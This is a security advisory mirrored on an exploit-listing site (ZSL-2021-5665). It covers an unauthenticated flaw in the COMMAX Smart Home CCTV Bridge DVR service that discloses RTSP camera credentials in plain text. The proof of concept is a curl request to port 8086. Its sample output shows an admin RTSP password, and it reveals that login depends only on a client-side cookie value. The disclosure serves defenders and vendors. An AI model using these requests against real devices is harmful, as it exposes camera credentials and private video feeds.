Share
## https://sploitus.com/exploit?id=ZSL-2021-5665
<html><body><p>COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021
--
$ curl http://TARGET:8086/overview.asp
</p>
<title> Infomation</title>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
<br/><br/>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46] Started <br/> </li><li> MAX USER : 32 <br/> </li><li> DVR Lists <br/>[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554 <br/>
</li></td></tr>
</table>
</center>
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");
if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
</body></html>